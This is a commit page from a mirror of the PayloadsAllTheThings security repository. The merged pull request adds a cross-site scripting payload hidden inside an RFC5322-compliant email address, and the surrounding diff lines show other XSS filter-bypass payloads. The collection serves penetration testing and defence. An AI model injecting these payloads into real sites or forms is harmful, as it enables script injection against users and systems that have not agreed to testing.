mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #723 from cydave/master
Add additional XSS payload in email addresses RFC5322
This commit is contained in:
commit
6d3fef0df3
@ -783,6 +783,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
|
||||
"><svg/onload=confirm(1)>"@x.y
|
||||
```
|
||||
|
||||
([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))
|
||||
|
||||
```javascript
|
||||
xss@example.com(<img src='x' onerror='alert(document.location)'>)
|
||||
```
|
||||
|
||||
### Bypass document blacklist
|
||||
|
||||
```javascript
|
||||
|
Loading…
Reference in New Issue
Block a user